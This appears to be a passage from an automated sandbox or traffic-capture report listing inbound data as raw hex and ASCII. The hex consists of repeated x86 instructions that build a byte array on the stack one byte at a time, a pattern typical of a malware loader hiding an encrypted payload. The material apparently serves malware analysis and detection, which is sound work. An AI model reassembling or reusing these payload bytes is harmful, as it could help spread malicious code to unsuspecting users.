2022-05-16 08:29:53 UTC	3677	IN	Data Raw: 85 b1 25 fb ff b6 c6 85 b2 25 fb ff c2 c6 85 b3 25 fb ff 6b c6 85 b4 25 fb ff 48 c6 85 b5 25 fb ff 9b c6 85 b6 25 fb ff c7 c6 85 b7 25 fb ff d0 c6 85 b8 25 fb ff 8d c6 85 b9 25 fb ff 32 c6 85 ba 25 fb ff 39 c6 85 bb 25 fb ff 85 c6 85 bc 25 fb ff 7d c6 85 bd 25 fb ff 4b c6 85 be 25 fb ff a8 c6 85 bf 25 fb ff f6 c6 85 c0 25 fb ff d3 c6 85 c1 25 fb ff 78 c6 85 c2 25 fb ff ab c6 85 c3 25 fb ff b7 c6 85 c4 25 fb ff d5 c6 85 c5 25 fb ff 0e c6 85 c6 25 fb ff 3c c6 85 c7 25 fb ff 5b c6 85 c8 25 fb ff 6b c6 85 c9 25 fb ff 5b c6 85 ca 25 fb ff e3 c6 85 cb 25 fb ff 10 c6 85 cc 25 fb ff fe c6 85 cd 25 fb ff 78 c6 85 ce 25 fb ff d2 c6 85 cf 25 fb ff 86 c6 85 d0 25 fb ff e3 c6 85 d1 25 fb ff bc c6 85 d2 25 fb ff bb c6 85 d3 25 fb ff 3e c6 85 d4 25 fb ff 6b c6 85 d5 25 Data Ascii: %%%k%H%%%%%2%9%%}%K%%%%x%%%%%<%[%k%[%%%%x%%%%%%>%k%
2022-05-16 08:29:53 UTC	3693	IN	Data Raw: ff df c6 85 d6 2e fb ff 7d c6 85 d7 2e fb ff 8b c6 85 d8 2e fb ff b2 c6 85 d9 2e fb ff 47 c6 85 da 2e fb ff f2 c6 85 db 2e fb ff fe c6 85 dc 2e fb ff e8 c6 85 dd 2e fb ff c1 c6 85 de 2e fb ff 05 c6 85 df 2e fb ff 1c c6 85 e0 2e fb ff 93 c6 85 e1 2e fb ff 43 c6 85 e2 2e fb ff da c6 85 e3 2e fb ff dd c6 85 e4 2e fb ff 42 c6 85 e5 2e fb ff ba c6 85 e6 2e fb ff bb c6 85 e7 2e fb ff 70 c6 85 e8 2e fb ff 29 c6 85 e9 2e fb ff ee c6 85 ea 2e fb ff dc c6 85 eb 2e fb ff f4 c6 85 ec 2e fb ff 31 c6 85 ed 2e fb ff ec c6 85 ee 2e fb ff 35 c6 85 ef 2e fb ff 61 c6 85 f0 2e fb ff ee c6 85 f1 2e fb ff b8 c6 85 f2 2e fb ff a1 c6 85 f3 2e fb ff 54 c6 85 f4 2e fb ff a7 c6 85 f5 2e fb ff 94 c6 85 f6 2e fb ff c6 c6 85 f7 2e fb ff 85 c6 85 f8 2e fb ff 2d c6 85 f9 2e fb ff ae c6 Data Ascii: .}...G........C...B...p.)....1..5.a....T.....-.
2022-05-16 08:29:53 UTC	3709	IN	Data Raw: fa 37 fb ff ba c6 85 fb 37 fb ff be c6 85 fc 37 fb ff b1 c6 85 fd 37 fb ff f5 c6 85 fe 37 fb ff 34 c6 85 ff 37 fb ff 53 c6 85 00 38 fb ff 12 c6 85 01 38 fb ff 51 c6 85 02 38 fb ff 32 c6 85 03 38 fb ff 88 c6 85 04 38 fb ff 18 c6 85 05 38 fb ff 72 c6 85 06 38 fb ff a8 c6 85 07 38 fb ff dd c6 85 08 38 fb ff 83 c6 85 09 38 fb ff 4d c6 85 0a 38 fb ff 9b c6 85 0b 38 fb ff c9 c6 85 0c 38 fb ff cd c6 85 0d 38 fb ff be c6 85 0e 38 fb ff f6 c6 85 0f 38 fb ff 98 c6 85 10 38 fb ff 1e c6 85 11 38 fb ff 0b c6 85 12 38 fb ff 79 c6 85 13 38 fb ff 2f c6 85 14 38 fb ff 0b c6 85 15 38 fb ff 25 c6 85 16 38 fb ff 99 c6 85 17 38 fb ff 57 c6 85 18 38 fb ff fe c6 85 19 38 fb ff c2 c6 85 1a 38 fb ff 8d c6 85 1b 38 fb ff 90 c6 85 1c 38 fb ff fa c6 85 1d 38 fb ff a4 c6 85 1e 38 fb Data Ascii: 7777747S88Q82888r8888M888888888y8/88%88W8888888
2022-05-16 08:29:53 UTC	3725	IN	Data Raw: fb c6 85 1f 41 fb ff fb c6 85 20 41 fb ff 01 c6 85 21 41 fb ff b6 c6 85 22 41 fb ff 4e c6 85 23 41 fb ff a0 c6 85 24 41 fb ff 00 c6 85 25 41 fb ff b9 c6 85 26 41 fb ff 3d c6 85 27 41 fb ff 1e c6 85 28 41 fb ff ab c6 85 29 41 fb ff 78 c6 85 2a 41 fb ff af c6 85 2b 41 fb ff f9 c6 85 2c 41 fb ff 77 c6 85 2d 41 fb ff a3 c6 85 2e 41 fb ff 64 c6 85 2f 41 fb ff e1 c6 85 30 41 fb ff 34 c6 85 31 41 fb ff 55 c6 85 32 41 fb ff f4 c6 85 33 41 fb ff 90 c6 85 34 41 fb ff 1b c6 85 35 41 fb ff 46 c6 85 36 41 fb ff c7 c6 85 37 41 fb ff 6e c6 85 38 41 fb ff 72 c6 85 39 41 fb ff e0 c6 85 3a 41 fb ff 68 c6 85 3b 41 fb ff 98 c6 85 3c 41 fb ff 21 c6 85 3d 41 fb ff aa c6 85 3e 41 fb ff 9d c6 85 3f 41 fb ff 32 c6 85 40 41 fb ff 35 c6 85 41 41 fb ff 3c c6 85 42 41 fb ff 7e c6 85 Data Ascii: A A!A"AN#A$A%A&A='A(A)Ax*A+A,Aw-A.Ad/A0A41AU2A3A4A5AF6A7An8Ar9A:Ah;A<A!=A>A?A2@A5AA<BA~
2022-05-16 08:29:53 UTC	3741	IN	Data Raw: 4a fb ff 12 c6 85 44 4a fb ff 79 c6 85 45 4a fb ff 85 c6 85 46 4a fb ff bf c6 85 47 4a fb ff 17 c6 85 48 4a fb ff ef c6 85 49 4a fb ff 59 c6 85 4a 4a fb ff 39 c6 85 4b 4a fb ff 88 c6 85 4c 4a fb ff fe c6 85 4d 4a fb ff 24 c6 85 4e 4a fb ff 88 c6 85 4f 4a fb ff 3e c6 85 50 4a fb ff 16 c6 85 51 4a fb ff 71 c6 85 52 4a fb ff cd c6 85 53 4a fb ff 13 c6 85 54 4a fb ff fe c6 85 55 4a fb ff ee c6 85 56 4a fb ff ac c6 85 57 4a fb ff f8 c6 85 58 4a fb ff 6c c6 85 59 4a fb ff 4f c6 85 5a 4a fb ff 6b c6 85 5b 4a fb ff 55 c6 85 5c 4a fb ff 53 c6 85 5d 4a fb ff be c6 85 5e 4a fb ff 13 c6 85 5f 4a fb ff 04 c6 85 60 4a fb ff 93 c6 85 61 4a fb ff 27 c6 85 62 4a fb ff 65 c6 85 63 4a fb ff 84 c6 85 64 4a fb ff 6f c6 85 65 4a fb ff 6f c6 85 66 4a fb ff f5 c6 85 67 4a fb ff Data Ascii: JDJyEJFJGJHJIJYJJ9KJLJMJ$NJOJ>PJQJqRJSJTJUJVJWJXJlYJOZJk[JU\JS]J^J_J`JaJ'bJecJdJoeJofJgJ
2022-05-16 08:29:53 UTC	3757	IN	Data Raw: c6 85 68 53 fb ff 04 c6 85 69 53 fb ff b3 c6 85 6a 53 fb ff bd c6 85 6b 53 fb ff b8 c6 85 6c 53 fb ff 63 c6 85 6d 53 fb ff 7d c6 85 6e 53 fb ff 4c c6 85 6f 53 fb ff 22 c6 85 70 53 fb ff 9a c6 85 71 53 fb ff 53 c6 85 72 53 fb ff 7e c6 85 73 53 fb ff cf c6 85 74 53 fb ff 19 c6 85 75 53 fb ff ab c6 85 76 53 fb ff 85 c6 85 77 53 fb ff e0 c6 85 78 53 fb ff e4 c6 85 79 53 fb ff 44 c6 85 7a 53 fb ff 72 c6 85 7b 53 fb ff bf c6 85 7c 53 fb ff fd c6 85 7d 53 fb ff ee c6 85 7e 53 fb ff 09 c6 85 7f 53 fb ff c2 c6 85 80 53 fb ff 88 c6 85 81 53 fb ff ef c6 85 82 53 fb ff 47 c6 85 83 53 fb ff 40 c6 85 84 53 fb ff 45 c6 85 85 53 fb ff 4f c6 85 86 53 fb ff d0 c6 85 87 53 fb ff ee c6 85 88 53 fb ff ea c6 85 89 53 fb ff ea c6 85 8a 53 fb ff 8e c6 85 8b 53 fb ff c3 c6 85 8c Data Ascii: hSiSjSkSlScmS}nSLoS"pSqSSrS~sStSuSvSwSxSySDzSr{S\|S}S~SSSSSGS@SESOSSSSSS
2022-05-16 08:29:53 UTC	3773	IN	Data Raw: fb ff d4 c6 85 8d 5c fb ff f1 c6 85 8e 5c fb ff 10 c6 85 8f 5c fb ff ec c6 85 90 5c fb ff 91 c6 85 91 5c fb ff ba c6 85 92 5c fb ff 6f c6 85 93 5c fb ff 54 c6 85 94 5c fb ff 68 c6 85 95 5c fb ff cf c6 85 96 5c fb ff 1d c6 85 97 5c fb ff a1 c6 85 98 5c fb ff e0 c6 85 99 5c fb ff 9b c6 85 9a 5c fb ff 87 c6 85 9b 5c fb ff d2 c6 85 9c 5c fb ff 96 c6 85 9d 5c fb ff fc c6 85 9e 5c fb ff 12 c6 85 9f 5c fb ff e4 c6 85 a0 5c fb ff 68 c6 85 a1 5c fb ff 27 c6 85 a2 5c fb ff 0f c6 85 a3 5c fb ff 38 c6 85 a4 5c fb ff 80 c6 85 a5 5c fb ff 8a c6 85 a6 5c fb ff 56 c6 85 a7 5c fb ff 12 c6 85 a8 5c fb ff 85 c6 85 a9 5c fb ff cd c6 85 aa 5c fb ff af c6 85 ab 5c fb ff c9 c6 85 ac 5c fb ff 4f c6 85 ad 5c fb ff 47 c6 85 ae 5c fb ff 3e c6 85 af 5c fb ff 92 c6 85 b0 5c fb ff cf Data Ascii: \\\\\\o\T\h\\\\\\\\\\\\h\'\\8\\\V\\\\\\O\G\>\\
2022-05-16 08:29:53 UTC	3789	IN	Data Raw: 85 b1 65 fb ff c9 c6 85 b2 65 fb ff 0b c6 85 b3 65 fb ff aa c6 85 b4 65 fb ff 95 c6 85 b5 65 fb ff f3 c6 85 b6 65 fb ff d6 c6 85 b7 65 fb ff 06 c6 85 b8 65 fb ff 43 c6 85 b9 65 fb ff 27 c6 85 ba 65 fb ff ae c6 85 bb 65 fb ff d8 c6 85 bc 65 fb ff 65 c6 85 bd 65 fb ff 7c c6 85 be 65 fb ff 2f c6 85 bf 65 fb ff 90 c6 85 c0 65 fb ff 6d c6 85 c1 65 fb ff 0d c6 85 c2 65 fb ff 80 c6 85 c3 65 fb ff f4 c6 85 c4 65 fb ff 17 c6 85 c5 65 fb ff 18 c6 85 c6 65 fb ff d1 c6 85 c7 65 fb ff de c6 85 c8 65 fb ff d2 c6 85 c9 65 fb ff f0 c6 85 ca 65 fb ff 7a c6 85 cb 65 fb ff 39 c6 85 cc 65 fb ff 70 c6 85 cd 65 fb ff 60 c6 85 ce 65 fb ff cc c6 85 cf 65 fb ff fa c6 85 d0 65 fb ff ce c6 85 d1 65 fb ff 09 c6 85 d2 65 fb ff 98 c6 85 d3 65 fb ff 41 c6 85 d4 65 fb ff e7 c6 85 d5 65 Data Ascii: eeeeeeeeCe'eeeee\|e/eemeeeeeeeeeeze9epe`eeeeeeAee
2022-05-16 08:29:53 UTC	3805	IN	Data Raw: ff a8 c6 85 d6 6e fb ff 45 c6 85 d7 6e fb ff fb c6 85 d8 6e fb ff cb c6 85 d9 6e fb ff 99 c6 85 da 6e fb ff c5 c6 85 db 6e fb ff b9 c6 85 dc 6e fb ff 35 c6 85 dd 6e fb ff 2c c6 85 de 6e fb ff 69 c6 85 df 6e fb ff 27 c6 85 e0 6e fb ff 4b c6 85 e1 6e fb ff be c6 85 e2 6e fb ff 16 c6 85 e3 6e fb ff cd c6 85 e4 6e fb ff 0b c6 85 e5 6e fb ff 3b c6 85 e6 6e fb ff 7d c6 85 e7 6e fb ff 0e c6 85 e8 6e fb ff 3c c6 85 e9 6e fb ff b3 c6 85 ea 6e fb ff 0c c6 85 eb 6e fb ff 02 c6 85 ec 6e fb ff ae c6 85 ed 6e fb ff 9b c6 85 ee 6e fb ff fa c6 85 ef 6e fb ff d5 c6 85 f0 6e fb ff be c6 85 f1 6e fb ff ee c6 85 f2 6e fb ff 50 c6 85 f3 6e fb ff b0 c6 85 f4 6e fb ff 14 c6 85 f5 6e fb ff 5a c6 85 f6 6e fb ff 07 c6 85 f7 6e fb ff 1f c6 85 f8 6e fb ff 20 c6 85 f9 6e fb ff 99 c6 Data Ascii: nEnnnnnn5n,nin'nKnnnnn;n}nn<nnnnnnnnnnPnnnZnnn n
2022-05-16 08:29:53 UTC	3821	IN	Data Raw: fa 77 fb ff 99 c6 85 fb 77 fb ff aa c6 85 fc 77 fb ff 66 c6 85 fd 77 fb ff 31 c6 85 fe 77 fb ff 24 c6 85 ff 77 fb ff 45 c6 85 00 78 fb ff 4a c6 85 01 78 fb ff 14 c6 85 02 78 fb ff b7 c6 85 03 78 fb ff 09 c6 85 04 78 fb ff 52 c6 85 05 78 fb ff 35 c6 85 06 78 fb ff 96 c6 85 07 78 fb ff 3e c6 85 08 78 fb ff fe c6 85 09 78 fb ff e8 c6 85 0a 78 fb ff c1 c6 85 0b 78 fb ff 32 c6 85 0c 78 fb ff 58 c6 85 0d 78 fb ff b1 c6 85 0e 78 fb ff b1 c6 85 0f 78 fb ff 04 c6 85 10 78 fb ff 75 c6 85 11 78 fb ff aa c6 85 12 78 fb ff 83 c6 85 13 78 fb ff 0c c6 85 14 78 fb ff 71 c6 85 15 78 fb ff df c6 85 16 78 fb ff a2 c6 85 17 78 fb ff 41 c6 85 18 78 fb ff ae c6 85 19 78 fb ff 0a c6 85 1a 78 fb ff a1 c6 85 1b 78 fb ff c2 c6 85 1c 78 fb ff 7c c6 85 1d 78 fb ff 6f c6 85 1e 78 fb Data Ascii: wwwfw1w$wExJxxxxRx5xx>xxxx2xXxxxxuxxxxqxxxAxxxxx\|xox
2022-05-16 08:29:53 UTC	3837	IN	Data Raw: 35 c6 85 1f 81 fb ff b2 c6 85 20 81 fb ff bc c6 85 21 81 fb ff bb c6 85 22 81 fb ff 3a c6 85 23 81 fb ff 90 c6 85 24 81 fb ff f7 c6 85 25 81 fb ff e8 c6 85 26 81 fb ff 34 c6 85 27 81 fb ff 1a c6 85 28 81 fb ff 63 c6 85 29 81 fb ff ba c6 85 2a 81 fb ff df c6 85 2b 81 fb ff af c6 85 2c 81 fb ff bf c6 85 2d 81 fb ff a5 c6 85 2e 81 fb ff 4e c6 85 2f 81 fb ff 36 c6 85 30 81 fb ff 75 c6 85 31 81 fb ff 94 c6 85 32 81 fb ff b3 c6 85 33 81 fb ff 6f c6 85 34 81 fb ff 15 c6 85 35 81 fb ff 84 c6 85 36 81 fb ff 87 c6 85 37 81 fb ff b6 c6 85 38 81 fb ff 1e c6 85 39 81 fb ff bf c6 85 3a 81 fb ff 1a c6 85 3b 81 fb ff 46 c6 85 3c 81 fb ff ca c6 85 3d 81 fb ff 10 c6 85 3e 81 fb ff 12 c6 85 3f 81 fb ff 48 c6 85 40 81 fb ff bd c6 85 41 81 fb ff 44 c6 85 42 81 fb ff 87 c6 85 Data Ascii: 5 !":#$%&4'(c)*+,-.N/60u123o456789:;F<=>?H@ADB
2022-05-16 08:29:53 UTC	3853	IN	Data Raw: 8a fb ff 77 c6 85 44 8a fb ff 81 c6 85 45 8a fb ff 08 c6 85 46 8a fb ff 7c c6 85 47 8a fb ff 61 c6 85 48 8a fb ff b6 c6 85 49 8a fb ff 5a c6 85 4a 8a fb ff 8f c6 85 4b 8a fb ff c8 c6 85 4c 8a fb ff 35 c6 85 4d 8a fb ff 7f c6 85 4e 8a fb ff 32 c6 85 4f 8a fb ff 87 c6 85 50 8a fb ff 4c c6 85 51 8a fb ff 24 c6 85 52 8a fb ff fb c6 85 53 8a fb ff fd c6 85 54 8a fb ff 98 c6 85 55 8a fb ff 28 c6 85 56 8a fb ff 91 c6 85 57 8a fb ff ca c6 85 58 8a fb ff e3 c6 85 59 8a fb ff b2 c6 85 5a 8a fb ff f9 c6 85 5b 8a fb ff a4 c6 85 5c 8a fb ff 4c c6 85 5d 8a fb ff 10 c6 85 5e 8a fb ff cb c6 85 5f 8a fb ff b8 c6 85 60 8a fb ff 9d c6 85 61 8a fb ff 32 c6 85 62 8a fb ff 7d c6 85 63 8a fb ff fd c6 85 64 8a fb ff b7 c6 85 65 8a fb ff 8d c6 85 66 8a fb ff 59 c6 85 67 8a fb ff Data Ascii: wDEF\|GaHIZJKL5MN2OPLQ$RSTU(VWXYZ[\L]^_`a2b}cdefYg
2022-05-16 08:29:53 UTC	3869	IN	Data Raw: c6 85 68 93 fb ff d7 c6 85 69 93 fb ff 03 c6 85 6a 93 fb ff e7 c6 85 6b 93 fb ff 38 c6 85 6c 93 fb ff fd c6 85 6d 93 fb ff 21 c6 85 6e 93 fb ff 9e c6 85 6f 93 fb ff 6c c6 85 70 93 fb ff 4b c6 85 71 93 fb ff f7 c6 85 72 93 fb ff 7e c6 85 73 93 fb ff 1d c6 85 74 93 fb ff c5 c6 85 75 93 fb ff 70 c6 85 76 93 fb ff a4 c6 85 77 93 fb ff 62 c6 85 78 93 fb ff 24 c6 85 79 93 fb ff f8 c6 85 7a 93 fb ff 63 c6 85 7b 93 fb ff f9 c6 85 7c 93 fb ff e3 c6 85 7d 93 fb ff fb c6 85 7e 93 fb ff 5b c6 85 7f 93 fb ff f9 c6 85 80 93 fb ff 1c c6 85 81 93 fb ff 4d c6 85 82 93 fb ff df c6 85 83 93 fb ff ac c6 85 84 93 fb ff 29 c6 85 85 93 fb ff e8 c6 85 86 93 fb ff c2 c6 85 87 93 fb ff 6f c6 85 88 93 fb ff 5a c6 85 89 93 fb ff ec c6 85 8a 93 fb ff 5a c6 85 8b 93 fb ff bb c6 85 8c Data Ascii: hijk8lm!nolpKqr~stupvwbx$yzc{\|}~[M)oZZ
2022-05-16 08:29:53 UTC	3885	IN	Data Raw: fb ff 07 c6 85 8d 9c fb ff 82 c6 85 8e 9c fb ff e7 c6 85 8f 9c fb ff 59 c6 85 90 9c fb ff fc c6 85 91 9c fb ff c8 c6 85 92 9c fb ff 94 c6 85 93 9c fb ff 1b c6 85 94 9c fb ff bd c6 85 95 9c fb ff 08 c6 85 96 9c fb ff fd c6 85 97 9c fb ff cb c6 85 98 9c fb ff 85 c6 85 99 9c fb ff e8 c6 85 9a 9c fb ff ec c6 85 9b 9c fb ff bc c6 85 9c 9c fb ff 6a c6 85 9d 9c fb ff 61 c6 85 9e 9c fb ff b8 c6 85 9f 9c fb ff ca c6 85 a0 9c fb ff 26 c6 85 a1 9c fb ff 3c c6 85 a2 9c fb ff 47 c6 85 a3 9c fb ff 8f c6 85 a4 9c fb ff 44 c6 85 a5 9c fb ff ed c6 85 a6 9c fb ff cd c6 85 a7 9c fb ff 03 c6 85 a8 9c fb ff d2 c6 85 a9 9c fb ff 0c c6 85 aa 9c fb ff 8e c6 85 ab 9c fb ff ba c6 85 ac 9c fb ff b7 c6 85 ad 9c fb ff 8b c6 85 ae 9c fb ff 32 c6 85 af 9c fb ff 68 c6 85 b0 9c fb ff ec Data Ascii: Yja&<GD2h
2022-05-16 08:29:53 UTC	3901	IN	Data Raw: 85 b1 a5 fb ff 74 c6 85 b2 a5 fb ff a3 c6 85 b3 a5 fb ff 37 c6 85 b4 a5 fb ff 4b c6 85 b5 a5 fb ff 64 c6 85 b6 a5 fb ff 69 c6 85 b7 a5 fb ff 27 c6 85 b8 a5 fb ff 6b c6 85 b9 a5 fb ff 9a c6 85 ba a5 fb ff 32 c6 85 bb a5 fb ff fd c6 85 bc a5 fb ff 30 c6 85 bd a5 fb ff a4 c6 85 be a5 fb ff 9a c6 85 bf a5 fb ff 53 c6 85 c0 a5 fb ff e2 c6 85 c1 a5 fb ff e4 c6 85 c2 a5 fb ff 6e c6 85 c3 a5 fb ff e7 c6 85 c4 a5 fb ff 0f c6 85 c5 a5 fb ff 90 c6 85 c6 a5 fb ff 68 c6 85 c7 a5 fb ff 6d c6 85 c8 a5 fb ff f9 c6 85 c9 a5 fb ff 05 c6 85 ca a5 fb ff 58 c6 85 cb a5 fb ff bd c6 85 cc a5 fb ff db c6 85 cd a5 fb ff 7a c6 85 ce a5 fb ff fb c6 85 cf a5 fb ff 68 c6 85 d0 a5 fb ff 87 c6 85 d1 a5 fb ff a0 c6 85 d2 a5 fb ff eb c6 85 d3 a5 fb ff b2 c6 85 d4 a5 fb ff ec c6 85 d5 a5 Data Ascii: t7Kdi'k20SnhmXzh
2022-05-16 08:29:53 UTC	3917	IN	Data Raw: ff b2 c6 85 d6 ae fb ff f0 c6 85 d7 ae fb ff a8 c6 85 d8 ae fb ff 54 c6 85 d9 ae fb ff 01 c6 85 da ae fb ff bc c6 85 db ae fb ff 6f c6 85 dc ae fb ff 27 c6 85 dd ae fb ff 74 c6 85 de ae fb ff 7f c6 85 df ae fb ff 20 c6 85 e0 ae fb ff 67 c6 85 e1 ae fb ff 1b c6 85 e2 ae fb ff 71 c6 85 e3 ae fb ff a2 c6 85 e4 ae fb ff 24 c6 85 e5 ae fb ff 98 c6 85 e6 ae fb ff b4 c6 85 e7 ae fb ff 55 c6 85 e8 ae fb ff f5 c6 85 e9 ae fb ff f6 c6 85 ea ae fb ff d3 c6 85 eb ae fb ff 39 c6 85 ec ae fb ff df c6 85 ed ae fb ff 39 c6 85 ee ae fb ff 70 c6 85 ef ae fb ff 60 c6 85 f0 ae fb ff c2 c6 85 f1 ae fb ff ba c6 85 f2 ae fb ff d2 c6 85 f3 ae fb ff 22 c6 85 f4 ae fb ff 54 c6 85 f5 ae fb ff 8d c6 85 f6 ae fb ff 2b c6 85 f7 ae fb ff f1 c6 85 f8 ae fb ff b0 c6 85 f9 ae fb ff b8 c6 Data Ascii: To't gq$U99p`"T+
2022-05-16 08:29:53 UTC	3933	IN	Data Raw: fa b7 fb ff 2b c6 85 fb b7 fb ff 70 c6 85 fc b7 fb ff 65 c6 85 fd b7 fb ff d8 c6 85 fe b7 fb ff 7c c6 85 ff b7 fb ff a1 c6 85 00 b8 fb ff 71 c6 85 01 b8 fb ff 8e c6 85 02 b8 fb ff af c6 85 03 b8 fb ff d2 c6 85 04 b8 fb ff 63 c6 85 05 b8 fb ff 41 c6 85 06 b8 fb ff 2f c6 85 07 b8 fb ff 93 c6 85 08 b8 fb ff 3c c6 85 09 b8 fb ff be c6 85 0a b8 fb ff 39 c6 85 0b b8 fb ff d0 c6 85 0c b8 fb ff ce c6 85 0d b8 fb ff 32 c6 85 0e b8 fb ff 24 c6 85 0f b8 fb ff d7 c6 85 10 b8 fb ff 96 c6 85 11 b8 fb ff 1c c6 85 12 b8 fb ff 12 c6 85 13 b8 fb ff 33 c6 85 14 b8 fb ff e5 c6 85 15 b8 fb ff f8 c6 85 16 b8 fb ff 9f c6 85 17 b8 fb ff 11 c6 85 18 b8 fb ff 95 c6 85 19 b8 fb ff e7 c6 85 1a b8 fb ff ed c6 85 1b b8 fb ff d0 c6 85 1c b8 fb ff 8b c6 85 1d b8 fb ff c2 c6 85 1e b8 fb Data Ascii: +pe\|qcA/<92$3
2022-05-16 08:29:53 UTC	3949	IN	Data Raw: ba c6 85 1f c1 fb ff 16 c6 85 20 c1 fb ff 8c c6 85 21 c1 fb ff 0d c6 85 22 c1 fb ff c9 c6 85 23 c1 fb ff d0 c6 85 24 c1 fb ff 97 c6 85 25 c1 fb ff 41 c6 85 26 c1 fb ff 1a c6 85 27 c1 fb ff dd c6 85 28 c1 fb ff f2 c6 85 29 c1 fb ff f2 c6 85 2a c1 fb ff 32 c6 85 2b c1 fb ff 24 c6 85 2c c1 fb ff 45 c6 85 2d c1 fb ff 77 c6 85 2e c1 fb ff 10 c6 85 2f c1 fb ff 59 c6 85 30 c1 fb ff cd c6 85 31 c1 fb ff c8 c6 85 32 c1 fb ff 3d c6 85 33 c1 fb ff 29 c6 85 34 c1 fb ff 27 c6 85 35 c1 fb ff df c6 85 36 c1 fb ff ad c6 85 37 c1 fb ff 70 c6 85 38 c1 fb ff 17 c6 85 39 c1 fb ff 94 c6 85 3a c1 fb ff 8e c6 85 3b c1 fb ff 0e c6 85 3c c1 fb ff e9 c6 85 3d c1 fb ff 01 c6 85 3e c1 fb ff cb c6 85 3f c1 fb ff 8f c6 85 40 c1 fb ff b0 c6 85 41 c1 fb ff 38 c6 85 42 c1 fb ff 0d c6 85 Data Ascii: !"#$%A&'()*2+$,E-w./Y012=3)4'567p89:;<=>?@A8B
2022-05-16 08:29:53 UTC	3965	IN	Data Raw: ca fb ff bb c6 85 44 ca fb ff 3a c6 85 45 ca fb ff d5 c6 85 46 ca fb ff 7e c6 85 47 ca fb ff ac c6 85 48 ca fb ff 9b c6 85 49 ca fb ff 7a c6 85 4a ca fb ff 6b c6 85 4b ca fb ff b8 c6 85 4c ca fb ff df c6 85 4d ca fb ff af c6 85 4e ca fb ff d3 c6 85 4f ca fb ff 6e c6 85 50 ca fb ff b1 c6 85 51 ca fb ff d2 c6 85 52 ca fb ff 31 c6 85 53 ca fb ff cc c6 85 54 ca fb ff 35 c6 85 55 ca fb ff ac c6 85 56 ca fb ff a4 c6 85 57 ca fb ff a0 c6 85 58 ca fb ff cf c6 85 59 ca fb ff 3d c6 85 5a ca fb ff 12 c6 85 5b ca fb ff f8 c6 85 5c ca fb ff 76 c6 85 5d ca fb ff 2a c6 85 5e ca fb ff 0d c6 85 5f ca fb ff 14 c6 85 60 ca fb ff bb c6 85 61 ca fb ff 65 c6 85 62 ca fb ff 9f c6 85 63 ca fb ff 31 c6 85 64 ca fb ff 30 c6 85 65 ca fb ff d6 c6 85 66 ca fb ff 79 c6 85 67 ca fb ff Data Ascii: D:EF~GHIzJkKLMNOnPQR1ST5UVWXY=Z[\v]*^_`aebc1d0efyg
2022-05-16 08:29:53 UTC	3981	IN	Data Raw: c6 85 68 d3 fb ff 18 c6 85 69 d3 fb ff c0 c6 85 6a d3 fb ff 7e c6 85 6b d3 fb ff 0e c6 85 6c d3 fb ff ab c6 85 6d d3 fb ff 90 c6 85 6e d3 fb ff 94 c6 85 6f d3 fb ff 5d c6 85 70 d3 fb ff 73 c6 85 71 d3 fb ff a3 c6 85 72 d3 fb ff 2c c6 85 73 d3 fb ff 20 c6 85 74 d3 fb ff fb c6 85 75 d3 fb ff fd c6 85 76 d3 fb ff 98 c6 85 77 d3 fb ff b0 c6 85 78 d3 fb ff 9d c6 85 79 d3 fb ff ca c6 85 7a d3 fb ff e3 c6 85 7b d3 fb ff 16 c6 85 7c d3 fb ff 62 c6 85 7d d3 fb ff f6 c6 85 7e d3 fb ff 69 c6 85 7f d3 fb ff 70 c6 85 80 d3 fb ff 7e c6 85 81 d3 fb ff 3d c6 85 82 d3 fb ff 5c c6 85 83 d3 fb ff b7 c6 85 84 d3 fb ff bd c6 85 85 d3 fb ff c0 c6 85 86 d3 fb ff 26 c6 85 87 d3 fb ff c7 c6 85 88 d3 fb ff 39 c6 85 89 d3 fb ff 2a c6 85 8a d3 fb ff 50 c6 85 8b d3 fb ff 28 c6 85 8c Data Ascii: hij~klmno]psqr,s tuvwxyz{\|b}~ip~=\&9*P(
2022-05-16 08:29:53 UTC	3997	IN	Data Raw: fb ff e7 c6 85 8d dc fb ff d3 c6 85 8e dc fb ff 7d c6 85 8f dc fb ff e4 c6 85 90 dc fb ff 13 c6 85 91 dc fb ff e0 c6 85 92 dc fb ff 27 c6 85 93 dc fb ff 72 c6 85 94 dc fb ff 34 c6 85 95 dc fb ff 39 c6 85 96 dc fb ff 85 c6 85 97 dc fb ff 70 c6 85 98 dc fb ff 36 c6 85 99 dc fb ff e5 c6 85 9a dc fb ff 24 c6 85 9b dc fb ff f8 c6 85 9c dc fb ff fc c6 85 9d dc fb ff 03 c6 85 9e dc fb ff ae c6 85 9f dc fb ff f2 c6 85 a0 dc fb ff bf c6 85 a1 dc fb ff fe c6 85 a2 dc fb ff 9e c6 85 a3 dc fb ff c5 c6 85 a4 dc fb ff df c6 85 a5 dc fb ff ed c6 85 a6 dc fb ff 91 c6 85 a7 dc fb ff a4 c6 85 a8 dc fb ff 4f c6 85 a9 dc fb ff 23 c6 85 aa dc fb ff 7e c6 85 ab dc fb ff e4 c6 85 ac dc fb ff 3f c6 85 ad dc fb ff ae c6 85 ae dc fb ff 56 c6 85 af dc fb ff 71 c6 85 b0 dc fb ff 6f Data Ascii: }'r49p6$O#~?Vqo
2022-05-16 08:29:53 UTC	4013	IN	Data Raw: 85 b1 e5 fb ff 35 c6 85 b2 e5 fb ff 57 c6 85 b3 e5 fb ff 4d c6 85 b4 e5 fb ff b0 c6 85 b5 e5 fb ff 7b c6 85 b6 e5 fb ff f8 c6 85 b7 e5 fb ff 8b c6 85 b8 e5 fb ff 3d c6 85 b9 e5 fb ff c3 c6 85 ba e5 fb ff 4e c6 85 bb e5 fb ff a3 c6 85 bc e5 fb ff 6c c6 85 bd e5 fb ff 1c c6 85 be e5 fb ff b3 c6 85 bf e5 fb ff 72 c6 85 c0 e5 fb ff 9d c6 85 c1 e5 fb ff b2 c6 85 c2 e5 fb ff 61 c6 85 c3 e5 fb ff 07 c6 85 c4 e5 fb ff 97 c6 85 c5 e5 fb ff 8f c6 85 c6 e5 fb ff 3b c6 85 c7 e5 fb ff 61 c6 85 c8 e5 fb ff 0d c6 85 c9 e5 fb ff 76 c6 85 ca e5 fb ff dc c6 85 cb e5 fb ff 41 c6 85 cc e5 fb ff 86 c6 85 cd e5 fb ff ba c6 85 ce e5 fb ff e7 c6 85 cf e5 fb ff 63 c6 85 d0 e5 fb ff 96 c6 85 d1 e5 fb ff 66 c6 85 d2 e5 fb ff 68 c6 85 d3 e5 fb ff 0d c6 85 d4 e5 fb ff 3e c6 85 d5 e5 Data Ascii: 5WM{=Nlra;avAcfh>
